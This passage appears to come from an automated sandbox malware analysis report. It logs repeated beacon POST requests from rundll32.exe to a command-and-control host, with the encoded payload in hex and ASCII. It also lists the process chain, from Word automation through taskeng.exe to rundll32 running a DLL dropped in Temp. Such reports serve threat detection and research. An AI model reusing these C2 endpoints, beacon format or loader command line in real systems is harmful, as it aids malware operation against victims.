              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:06 UTC153INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:06 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:06 UTC153INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              92192.168.2.224926464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:07 UTC153OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:07 UTC153OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:07 UTC154INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:07 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:07 UTC154INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              93192.168.2.224926564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:08 UTC154OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:08 UTC155OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:08 UTC156INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:08 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:08 UTC156INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              94192.168.2.224926664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:09 UTC156OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:09 UTC156OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:09 UTC157INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:09 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:09 UTC158INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              95192.168.2.224926764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:10 UTC158OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:10 UTC158OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:11 UTC159INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:10 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:11 UTC159INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              96192.168.2.224926864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:11 UTC159OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:11 UTC160OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:12 UTC161INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:11 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:12 UTC161INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              97192.168.2.224926964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:12 UTC161OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:12 UTC161OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:13 UTC162INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:12 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:13 UTC163INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              98192.168.2.224927064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:13 UTC163OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:13 UTC163OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:14 UTC164INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:14 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:14 UTC164INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              99192.168.2.224927164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:14 UTC164OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:14 UTC165OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:15 UTC166INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:15 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:15 UTC166INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Click to jump to process

              Target ID:0
              Start time:08:38:15
              Start date:14/08/2022
              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
              Imagebase:0x13fce0000
              File size:1423704 bytes
              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:4
              Start time:08:38:36
              Start date:14/08/2022
              Path:C:\Windows\System32\taskeng.exe
              Wow64 process (32bit):false
              Commandline:taskeng.exe {42E32873-DCC3-405E-9458-A04BFDF9CD6F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
              Imagebase:0xff4d0000
              File size:464384 bytes
              MD5 hash:65EA57712340C09B1B0C427B4848AE05
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:5
              Start time:08:38:37
              Start date:14/08/2022
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws
              Imagebase:0xffd20000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              No disassembly